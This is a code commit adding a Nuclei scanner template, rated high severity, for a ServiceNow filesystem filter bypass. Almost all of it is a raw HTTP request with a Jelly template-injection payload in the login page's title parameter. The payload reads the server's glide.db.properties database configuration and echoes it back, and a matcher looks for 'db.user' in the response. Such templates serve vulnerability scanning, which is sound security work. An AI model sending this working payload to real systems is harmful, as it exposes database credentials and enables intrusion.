Create servicenow-filesystem-bypass.yaml

2024-07-11 12:18:03 +05:30 · 2024-07-11 12:18:03 +05:30 · dfdc32e3a1
parent 064ae930b1
commit dfdc32e3a1
1 changed files with 19 additions and 0 deletions
--- a/http/misconfiguration/servicenow-filesystem-bypass.yaml
+++ b/http/misconfiguration/servicenow-filesystem-bypass.yaml
@ -0,0 +1,19 @@
+id: servicenow-filesystem-bypass
+
+info:
+  name: Service Now - Filesystem Filter Bypass
+  author: DhiyaneshDk
+  severity: high
+
+http:
+  - raw:
+      - |
+        GET /login.do?jvar_page_title=<style><j:jelly xmlns:j="jelly:core" xmlns:g='glide'><g:evaluate>z=new Packages.java.io.File("").getAbsolutePath();z=z.substring(0,z.lastIndexOf("/"));u=new SecurelyAccess(z.concat("/co..nf/glide.db.properties")).getBufferedReader();s="";while((q=u.readLine())!==null)s=s.concat(q,"\n");gs.addErrorMessage(s);</g:evaluate></j:jelly></style> HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'db.user'